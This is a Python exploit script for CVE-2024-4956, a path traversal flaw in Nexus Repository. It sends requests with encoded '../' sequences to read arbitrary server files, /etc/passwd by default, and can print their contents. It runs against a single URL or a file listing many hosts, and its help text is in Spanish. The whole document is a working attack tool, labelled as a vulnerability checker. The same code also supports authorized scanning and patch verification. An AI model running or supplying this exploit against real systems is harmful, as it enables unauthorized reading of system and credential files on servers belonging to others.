import requests
import argparse
from colorama import Fore, Style, init
import urllib3
from urllib.parse import urlparse

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init(autoreset=True)
def print_banner():
    banner = """
    ###############################################
    #     CVE-2024-4956 - Nexus PATH Traversal    #
    #                @merlax_                     #
    ###############################################
    """
    print(banner)
def encode_directory(directory):
    return directory.replace("/", "%2F")

def make_request(host, directory, match_string, show_response):
    parsed_url = urlparse(host)
    nethost = parsed_url.netloc
    encoded_directory = encode_directory(directory)
    url = f"{host}/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..{encoded_directory}"
    headers = {
        'Host': nethost,
        'User-Agent': 'Mozilla/5.0 LoL',
    }
    try:
        response = requests.get(url, headers=headers, verify=False)
        if match_string in response.text:
            print(f"{Fore.GREEN}[+] VULNERABLE: {host}{Style.RESET_ALL}")
            if show_response:
                print(response.text)
        else:
            print(f"{Fore.RED}[-] No Vulnerable: {host}{Style.RESET_ALL}")
    except requests.exceptions.RequestException as e:
        print(f"{Fore.RED}[-] Error en {host}: {e}{Style.RESET_ALL}")
def main():
    parser = argparse.ArgumentParser(description='CVE-2024-4956 - Nexus PATH Traversal Checker')
    parser.add_argument('-s', '--single', help='URL individual')
    parser.add_argument('-f', '--file', help='Archivo con URLs')
    parser.add_argument('-d', '--directory', default='/etc/passwd', help='Directorio a incluir en el request')
    parser.add_argument('-m', '--match-string', default='nexus', help='Cadena a buscar en la respuesta (en caso de modificar el archivo con -d)')
    parser.add_argument('-r', '--show-response', action='store_true', help='Mostrar archivo accedido')
    args = parser.parse_args()
    print_banner()
    if args.single:
        make_request(args.single, args.directory, args.match_string, args.show_response)
    elif args.file:
        with open(args.file, 'r') as f:
            for line in f:
                host = line.strip()
                if host:
                    make_request(host, args.directory, args.match_string, args.show_response)
    else:
        print("Debe proporcionar una URL (-s) o un archivo con URLs (-f).")

if __name__ == '__main__':
    main()